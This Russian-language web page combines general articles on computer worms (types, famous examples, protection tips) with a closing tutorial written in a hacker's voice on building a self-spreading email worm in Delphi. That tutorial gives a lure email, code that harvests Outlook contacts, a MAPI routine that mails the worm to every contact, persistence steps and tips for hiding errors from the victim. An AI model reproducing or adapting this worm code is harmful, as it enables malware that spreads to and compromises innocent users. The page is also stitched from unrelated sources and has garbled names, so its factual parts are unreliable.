Интернет черви вирусы. Компьютерные черви что это такое. Смотреть что такое "Компьютерный червь" в других словарях

Компьютерные вирусы, вредоносное ПО - все это губительно для операционной системы. Что же делать? Как победить ненавистные вирусные программы? Начинающие пользователи скажут, что достаточно установить антивирус. Но не все так просто. Ведь чтобы победить вирус, необходимо знать к какому виду он относится.

Одна из самых распространенных вредоносных программ - вирус-червь. Как обезопасить свой компьютер от проникновения этого незваного гостя, и что он вообще собой представляет?

Что такое «вирус-червь»?

Разновидностей вредоносного компьютерного ПО огромное количество. Один из тех вирусов, от которых после заражения избавиться довольно проблематично - вирус «сетевой червь». Это самовоспроизводящаяся компьютерная программа, проникающая в локальные и глобальные сети. При этом существенное различие между обычным вирусом и этой вредоносной программой - то, что вторая полностью самостоятельна.

Виды сетевых червей

Компьютерный вирус-червьподразделяется на три категории, которые существенно отличаются по своим характеристикам и наносимому устройству вреду.

  • Первая категория - почтовые черви. Они обычно распространяются одним файлом через электронную почту. Пользователю на ящик приходит письмо от неизвестного адресата с вложением. Естественно, поддавшись любопытству, он сам открывает вложение, которое уже содержит сетевого червя, после чего и происходит заражение.
  • Вторая категория, являющаяся наиболее распространенной среди вредоносного ПО - резидентные черви ОЗУ. Этот вирус заражает не жесткие диски, а внедряется в оперативную память, тем самым нанося вред работающим программам. Чтобы такой вирус-червь «отправился восвояси», достаточно перезагрузить компьютер.
  • Третья и самая опасная категория - черви, сохраняющие код на жестком диске устройства. Их чаще всего используют, чтобы нанести какой-либо информационный вред, например, осуществить атаку DoS. И тут перезагрузкой компьютера проблему уже не решить. Здесь помогут только высококачественные антивирусные системы, да и то не все. Начать лечение зараженного диска следует как можно раньше, иначе придется попрощаться со всей операционной системой.

Как и с какой целью распространяются сетевые черви?

Подобные вирусы распространяются хакерами для достижения разных целей. Некоторые программы созданы для перехвата управления устройством. При этом сам пользователь никогда не заметит то, что делает вирус-червь. Другие же используют зараженный компьютер как способ распространения вируса через все доступные сети, как локальные, так и глобальные.

Для распространения червя хакеры придумали достаточно много разных способов. Чаще всего встречается вирус, который изначально пользователь должен сам запустить на своем компьютере. Это может быть электронное вложение или какая-нибудь мини-программа, скачанная из Интернета. Однако есть и те, которым для заражения устройства не требуется чужого вмешательства, они самостоятельно осуществляют проникновение.

Как защититься?

Чтобы не допустить заражения компьютера вирусом, необходимо знать о средствах защиты. Многие скажут, что достаточно будет любой антивирусной программы, ведь она сразу же блокирует вирусы при попадании в систему. На самом деле это не так. Антивирусная программа не сможет вовремя предотвратить попадание червя на устройство, так как она просто предупреждает об обнаружении вредоносной программы на том или ином сайте. Большинство пользователей не придают этому значения, запуская или скачивая зараженный файл себе на компьютер.

Отличным вариантом для защиты от подобного рода ПО является проактивная технология. В отличие от обычных антивирусных программ, такая технология будет предотвращать заражение системы, а не осуществлять поиск уже известных вирусов на жестких дисках. При этом вирус будет заблокирован, только если он представляет собой реальную угрозу ОС.

Сетевой червь: как удалить вирус?

Если вредоносное ПО все-таки попало на компьютер, необходимо немедленно его удалить. Но как удалить вирус так, чтобы не повредить операционную систему? В такой ситуации на помощь неопытным пользователям придут антивирусы. К счастью, их установка не займет много времени.

  • Kaspersky Rescue Disk - программа, позволяющая очистить жесткие диски от вирусов путем управления системой. Чтобы начать работу с программой, нужно записать загрузочный диск через ISO-образ. А после просто запустить операционную систему в BIOS через него.
  • Kaspersky Virus Removal Tool больше подойдет для начинающих пользователей и тех, кто еще не разобрался в тонкостях системы. Он осуществляет поиск вредоносных программ на компьютере и удаляет их из системы. Однако справиться он может не со всеми видами вирусов.

  • Dr.Web CureIt вполне может заменить предыдущую антивирусную программу. Его огромный минус в том, что сканирование жестких дисков осуществляется очень долго. Порой это может занять около десяти часов. Конечно, такая долгая проверка является знаком того, что программа тщательно сканирует каждый файл. Однако найдется не много желающих потратить весь день на поиск одного вируса.

Меры предосторожности

Чтобы оградить себя от нападений хакеров через вирусы, необязательно устанавливать на компьютере кучу специальных защитных программ. Достаточно соблюдать меры предосторожности в сети, тогда ни один вредоносный файл не попадет на устройство.

  • Если на электронную почту пришло важное сообщение с вложением, не стоит спешить его открывать. Сначала необходимо сохранить вложение на диск, а потом запустить его, используя какой-либо браузер. Возможно, вместо текстового документа или фотографии на компьютер поступил исполняемый файл.
  • Ни в коем случае нельзя запускать какую-либо программу, которая поступила на электронную почту с незнакомого адреса. Скорее всего, на устройство пришел хакерский файл.
  • Даже если вложение пришло с уже знакомого e-mail, не стоит спешить его открывать. Прежде всего, необходимо просканировать его антивирусом. Не исключено, что электронный адрес, с которого пришло письмо, уже заражен вредоносным ПО и теперь просто отправляет рассылку по всем сохраненным контактам.
  • Признаком того, что в присланном вложении будет вирус, может послужить какая-либо сенсационная новость в сообщении. Это просто приманка для того, чтобы пользователь заинтересовался содержанием и из любопытства открыл зараженный файл.

Червь, в некотором смысле, схож с компьютерными вирусами. Эта программа так же способна к многократному размножению в памяти ПК, однако она не всегда способна нарушать работоспособность аппаратуры. Червь действует скрытно, и обнаружить его не так легко. Он дают о себе знать тогда, когда начинают зависать некоторые проги или сама операционка. При этом, червь использует все доступные ресурсы ПК, в том числе, и программные.

Обычно, червь попадает в память компьютера в виде одиночного приложения. В отличие от вирусов, эта программа не прикрепляются к отдельными приложениям. Чаще всего, подцепить червя можно через интернет.

Самые известные вирусы- черви.

Типичный пример – «Code Read». Это простейший интернет-червь, которой заражает компьютеры с ПО от Microsoft. Именно этот червь уже успел заразить более 6 миллионов серверов по всему миру. После попадания в память, «Code Read» может запустить атаку на конкретный компьютер в сети, используя его уникальный IP-адрес. Чуть позже появись новые представители программ отряда «Червь» - «Code Reed II». Это более агрессивный собрат, в котором сохранились аналогичные слабости и принцип действия. В его ядре содержится троян способный полностью подчинить себе операционную систему. (Прочитать подробнее о трояне вы можете ) Нельзя не упомянуть и о NIMDA . Код этого приложения представляет собой комбинацию трояна и обыкновенного червя . Известно, что он быстро размножается и уже успел испортить настроение более 8 миллионам администраторам сетей.

Как защитить свой ПК от вируса?

Существует несколько простых правил, соблюдение которых гарантирует сохранность операционной системы:

  • если не уверен в надежности портала, проходи мимо.
  • использовать поменьше нелицензионных программ.
  • не следует вводить системные команды под диктовку неизвестного «помощника».

Помните, что ни один антивирус не обеспечивает стопроцентный уровень защиты.

Существует еще масса возможностей защититься от вирусов, здесь описаны лишь самые простые и эффективные. Чтобы вирус не проник в ПК, рекомендуется установить антивирус и почаще обновлять вирусные базы.

Современный червь может развиваться и становиться хитрее, поэтому нельзя надеяться только антивирус. Со временем, вирусы становятся сильнее, а обнаружить их не удается.

Другие способы защиты.

В Windows имеется встроенная система защиты – брандмаузер, способный дать отпор виртуальным червям. Кроме того, специалисты рекомендуют использовать проверенные программы, а не скачивать все подряд. Классические вирусы можно нейтрализовать с помощью Firewall Plus – простейшего приложения, ориентированного на борьбу с троянами, клавиатурными шпионами и прочей нечистью. Помните, что «всемирная паутина» - излюбленное место для червяков, поэтому не открывайте электронные письма от неизвестных лиц с прикрепленными файлами.

Напоследок.

Еще один немаловажный совет. Вредоносный код создан для того, чтобы наносить вред файлам и личным данным. Поэтому, на отдельном носителей всегда должна иметься запасная копия данных. Следует помнить, большинство червей попадает в ПК через архивы с бесплатными приложениями. И помните, что спам так же может принести незваного гостя в виде электронного письма с ZIP-архивом.

Типы червей различаются по следующим признакам: по способу распространения червя - то как он передает всою копию на удаленные компьютеры, по способу запуска копии червя на заражаемом компьютере, по методу внедрения в систему, кроме того по таким характеристикам как полифоризм, "стелс" и прочие типы вредоносного программного обеспечения (вирусы, троянские программы).

О почтовых червях - Email-Worm

Эта категория червей характеризуется тем, что для своего распространения они используют электронную почту. Червь действует следующим образом: он отсылает свою копию в виде вложения в электронное письмо или присылает ссылку на свой файл, расположенный на одном из сетевых ресурсов, например URL на зараженный файл, находящийся на взломанном или хакерском веб-сайте. В итоге, при открытии зараженнго вложения или ссылки на зараженный файл, активизируется код червя.

Наиболее распространенные пути отправки зараженных сообщений почтовыми червями:

  • использование сервисов MS Outlook;
  • через функции Windows MAPI;
  • через прямое подключение к SMTP-серверу, при использовании встроенной в код червя почтовой библиотеки.

Методы, используемые почтовыми червями для посика почтовых адресов для отправки зараженных писем:

  • могут разослать себя по всем адресам, найденным в адресной книге MS Outlook и по адресам, которые обнаружат в почтовом ящике, а некоторые почтовые черви смогут даже "ответить" на обнаруженные в ящике письма;
  • они сканируют доступные им файлы на диске и выделяют в них строки, которые идентифицируются как ареса электронной почты.

В основном черви используют сразу несколько из вышеизложенных методов. Существуют и другие методы по поиску "электронных" адресов.

Черви, использующие интернет-пейджеры - IM-Worm

Черви этого типа используют единственный способ своего распространения, они рассылают себя на обнаруженные контакты сообщений в контакт-листе, эти контакты содержат URL на файл, распологающийся на одном из веб-серверов. Этот прием почти один в один копирут такойже способ рассылки, используемый почтовыми червями.

IRC-Worm - черви в IRC-каналах

Как и почтовые черви, этот тип червей имеет два способа распространения по IRC-каналам.

Второй способ: отсылка зараженного файла несчастному пользователю. Атакуемый пользователь, в свое время, должен подтвердит принятие этого файла, после чего сохранить его на диск и открыть (запустить).

Net-Worm - прочие сетевые черви

Для первого способо характерно то, что червь пытается найти удаленные компьютеры, отыскав, копирует себя в катологи, которые открыты на чтение и запись, в случае наличия таковых. Черви этого типа могут просто перебирать доступные сетевые катологи, используя функции операционной системы. Или такие черви будут случайным орбразом искать компьютеры в глобальной сети и, подключаясь к компьютерам, осуществлять попытки открыть их диски на полный доступ.

Второй способ возможен при наличии критических уязвимостей в программном обеспечении компьютера. Данные черви ищут такие компьютеры и посылают специально оформленный сетевой пакет или запрос (эксплойт уязвимости), таким образом код червя проникает на компьютер. При содержании в сетевом пакете только части кода червя, основной файл скачивается им после проникновения и запускается на исполнение.

К отдельной категории относятся черви, которые используют для своего распространения веб- и FTP- сервера. Процесс заражения можно разделить на два этапа: на первой стадии червь проникает в компьютерный сервер и определенным образом модифицирует служебные файлы сервера (как пример можно прривести статистические веб-странички). После этого он находится в ожидании посетителей, которые захотят запросить информацию с данного зараженного сервера, и так проникают на другие компьютеры в сети.

В основном компьютерные черви используют более одного способа, чтобы распространить свои копии по сетям (могут обладать двуми и более методами атаки удаленных компьютеров).

Черви для файлообменных сетей - P2P-Worm

Такой червь, для внедрения в P2P-сеть, копирует себя в каталог обмена файлами, расположенный как правило на локальной машине. Все остальное, в некотором смысле, будет происходить само, так как Р2Р- сеть возьмет на себя работу по распространению вируса - осуществляя поиск в сети она сообщит удаленным пользователям об этом файле, и обеспечит всем необходимым для скачивания файла с зараженного компьютера.

Есть и более сложные P2P-черви, способные имитировать сетевой протокол реально существующей файлообменной системы и отвечать положительно на поисковые запросы, в этом случае черьвь предлагает для скачивания свою копию.

Основным признаком, по которому черви различаются между собой, является способ распространения червя. Другими признаками различия являются способы запуска копии червя на заражаемом компьютере, методы внедрения в систему, а также полиморфизм , «стелс» и прочие характеристики, присущие и другим типам вредоносного программного обеспечения (вирусам и троянским программам).

Виды червей

В зависимости от путей проникновения в операционную систему черви делятся на:

  • Почтовые черви (Mail-Worm) - черви, распространяющиеся в формате сообщений электронной почты. При этом червь отсылает либо свою копию в виде вложения в электронное письмо, либо ссылку на свой файл, расположенный на каком-либо сетевом ресурсе (например, URL на зараженный файл, расположенный на взломанном или хакерском веб-сайте). В первом случае код червя активизируется при открытии (запуске) зараженного вложения, во втором - при открытии ссылки на зараженный файл. В обоих случаях эффект одинаков - активизируется код червя.
  • IM черви (IM-Worm) - черви, использующие интернет-пейджеры. Известные компьютерные черви данного типа используют единственный способ распространения - рассылку на обнаруженные контакты (из контакт-листа) сообщений, содержащих URL на файл, расположенный на каком-либо веб-сервере. Данный прием практически полностью повторяет аналогичный способ рассылки, использующийся почтовыми червями.
  • P2P черви (P2P-Worm) - черви, распространяющееся при помощи пиринговых (peer-to-peer) файлообменных сетей. Механизм работы большинства подобных червей достаточно прост - для внедрения в P2P-сеть червю достаточно скопировать себя в каталог обмена файлами, который обычно расположен на локальной машине. Всю остальную работу по распространению вируса P2P-сеть берет на себя - при поиске файлов в сети она сообщит удаленным пользователям о данном файле и предоставит весь необходимый сервис для скачивания файла с зараженного компьютера. Существуют более сложные P2P-черви, которые имитируют сетевой протокол конкретной файлообменной системы и на поисковые запросы отвечают положительно - при этом червь предлагает для скачивания свою копию.
  • Черви в IRC-каналах (IRC-Worm). У данного типа червей, как и у почтовых червей, существуют два способа распространения червя по IRC-каналам, повторяющие способы, описанные выше. Первый заключается в отсылке URL-ссылки на копию червя. Второй способ - отсылка зараженного файла какому-либо пользователю сети. При этом атакуемый пользователь должен подтвердить прием файла, затем сохранить его на диск и открыть (запустить на выполнение).
  • Сетевые черви (Net-Worm) - прочие сетевые черви, среди которых имеет смысл дополнительно выделить интернет-черви и LAN-черви
    • Интернет черви - черви, использующие для распространения протоколы Интернет. Преимущественно этот тип червей распространяется с использованием неправильной обработки некоторыми приложениями базовых пакетов стека протоколов TCP/IP
    • LAN-черви - черви, распространяющиеся по протоколам локальных сетей

Сегодня я опишу тебе принцип работы сетевого вируса. Тема, как ты понял, весьма актуальная, поскольку 70% лично моего ящика всегда бывает забита вирусами самого разного пошиба
- от мелких, но злобных VBS-червей до полуторамеговых произведений младших школьников 🙂 Они-то ведь не знают про существование WinAPI 🙂

Для проникновения на компьютер вирусы могут либо использовать баги в ПО юзера (VBS+Outlook= love:)) либо- баги в голове самого юзера. Рассмотрим пример такого вирусного письма:

Subj: Прикол
Привет! Держи крутой прикол, который я тебе (или не тебе, не помню:)) Обещал. Но все равно держи. Не бойся, по-настоящему он ничего не форматирует!
Проверить не забудь, параноик 🙂
Успехов!
Attach: fake_format.exe

Ну так вот: каждый ламероватый интернетчик посылает своим друзьям приколы постоянно, и, соответственно, не очень-то помнит, кому чего обещал; сообщение о "ненастоящем форматировании" переключает мозги жертвы в русло приколов, а слепая вера в антивирусы
- добивает 🙂 Напомню - описанные мной алгоритмы не определяются никакими webами, avp и другими бойцами.

Короче, мне самому уже захотелось запустить этот веселенький прикол. Запускаю 🙂

Error... intel pentium 5 not found!

Ой.. Вроде как не работает? Не, не угадал 🙂 На самом деле вирус тут же перенес свое тело на хард к жертве, записался в автозагрузку, и теперь будет тусоваться в оперативочке (хинт: на медицинском жаргоне "оперативка"- это ОПЕРАТИВНАЯ ХИРУРГИЯ, так что будь осторожен;)) жертвы по принципу, описанному мной в статье "резидентный вирус своими руками". Только вот проверять он будет не запуск файлов, а подключение к сети интернет 🙂 (в исходнике это будет процедура IsOnline, так, на будущее;)). Впрочем, одновременно
мониторить запуск файлов тебе никто не мешает
- это все-таки вирус, хоть и сетевик. Поэтому в логику я включу процедуру InfectFile. Таким образом, мы будем использовать следующие функции и процедуры:

ISONLINE - проверка соединения с инетом
SENDVIRUS - догадайся с трех раз 😉
GETMAILS - получаем адреса из AddresBook аутглюка
INFECTFILES - 🙂
WORKMEMORY - почти то же, что в прошлой статье, но с модификациями.

КОДИНГ

До начала собственно кодига на этот раз необходимы будут долгие предварительные ласки 🙂 Объясняю почему: для чтения адресной книги мы будем обращаться к аутлуку по межпрограммному интерфейсу, а для этого нам нехило поиметь его type library. Вот и делай: projectа import type library, и ищи там…правильно, Outlook express v.9 или какой там у тебя стоит. Девятой считается версия, если не ошибаюсь, из Office2k. Импортировал? Что значит "нет в списке"? Да ладно, бывает. Ищи вручную
- в каталоге с офисом есть файл msoutl.olb. Это она 😉 Теперь в раздел uses пиши outlook_tlb и будешь иметь доступ к самым интимным местам адресной книги 🙂 Ой, какой-то я сегодня озабоченный 😉
В общем, процедура потрошения адресбука должна выглядеть как:

uses
ComObj, outlook_tlb,
Forms;
....
Procedure GETMAILS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s: string;
num, i: Integer;
mails: array of string;

begin
MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength (mails,MyFilder.Items.Count);
for i:= 1 to MyFolder.Items.Count do
begin
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;
end;

Ну как, порадовало тебя написанное? Гы, дальше будет только хуже. Потому что отправка вируса будет на чистом API. А это, как говорит Horrific: "то же самое, что ручной секс. Эффект есть в обоих случаях, но его приходится долго добиваться и нет такого кайфа" 🙂 Ну
так что я тут понаписал? Uses Comobj позволяет нам работать с COM технологией; далее мы только создаем OLE объект аутлука, и циклически выясняем у него список емайлов. Если тебе хочется выяснить еще что-нибудь
- это тоже реально, читай доки - они рулез. Хоть и на английском. Список емайлов пишется в динамический массив из строчек. Его будет юзать функция SendVirus. Вот эта:

function SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i: integer;
s: string;
begin
with MapiRecipDesc do begin
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= nil;
end;

with MapiFileDesc do begin
ulReserved:= 0;
flFlags:= 0;
nPosition:= 0;
lpszPathName:= PChar(Attachment);
lpszFileName:= nil;
lpFileType:= nil;
end;

with MapiMessage do begin
ulReserved:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Subject);
lpszMessageType:= nil;
lpszDateReceived:= nil;
lpszConversationID:= nil;
flFlags:= 0;
lpOriginator:= nil;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
if length(Attachment) > 0 then begin
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
end else begin
nFileCount:= 0;
lpFiles:= nil;
end;
end;

Result:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
or MAPI_LOGON_UI or MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
end;

Ты не опух, пока это читал? Пойди, попей пивка, а то ничего не поймешь.
Выпил? Я тоже 😉 Хорошо, продолжаем. Юзать будешь так:

For i:= 1 to length (mails) do
begin
SendVirus ("",mails[i],"pricol","..");
end;

Здесь мы задействуем функции uses MAPI, поэтому не забудь его объявить. Короче, это
- низкоуровневая работа с почтой. А для работы с почтой, как ты знаешь, надо иметь а)
email получателя б) текст письма в) аттач. Вот я и делаю:
MapiRecipDesc - описываю получателя, MapiFileDesc - аттач,
т.е. наш вирус, MapiMessage - это сообщение, потом я его командой MapiSendMail отправлю в большую жизнь 😉 Ну, не так это оказалось и сложно. Главное понять, что твой самый большой друг
- это не c:\porno, а win32.hlp 🙂

Как же теперь все это словоблудие уложить в суровую логику вируса? Сам разберешься, я тебе уже 2 статьи подряд об этом долблю. И вообще, я вчера отмечал день рождения моей девушки, теперь у меня слегка трещит голова 🙂 Ну ладно, чувство долга сильнее. Just Do It:
первой строчкой проверяешь имя файла, откуда ты стартовал. Если
pricol.exe - значит CopyFile к виндам 🙂 А если стартанул из виндового каталога
- то циклически проверяй подключение к всемирной 😉 сети. Проверяем:

function IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
begin
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Result:= (Res = 0) and (dwCount > 0);
end;

Так. Если все путем, то вперед - тряси адресную книгу и рассылайся. Тут есть две хитрости. Если твое имя
pricol.exe - незамедлительно проверяй соединение. Возможно, пользователь проверяет почту в онлайне. Так наши шансы на рассылку сильно возрастут. До второй хитрости ты уже допер сам,
а именно, при описанном мной раскладе ты будешь все время отправлять одному и тому же юзеру одинаковые письма, только потому, что его не стерли из адресбука. Следовательно, все отработанные адреса записывай в логфайл и постоянно с ним сверяйся. Вроде бы все. Хотя нет. Не забывай ошибкоопасные фрагменты кода заключать в try..except. И ставить ключ {$D-}. Потому что если юзер вдруг поймает ошибку в духе ""FUCK" is not valid integer value", он что-то да заподозрит.

ЗАКЛЮЧЕНИЕ

Эта последняя статья про вирусы, отлаженные под windows 9x. Недавно я форматнул винт, и поставил WindowsXP Professional, поэтому следующие примеры будут уже под него. А ты уже можешь потихоньку покупать Delphi 7, поскольку я свои шестые где-то посеял, и сейчас сижу вообще голый 🙂 Покупать буду, соответственно, седьмые 😉

Следующая статья, наверное будет посвящена стеганографии и ее практической реализации.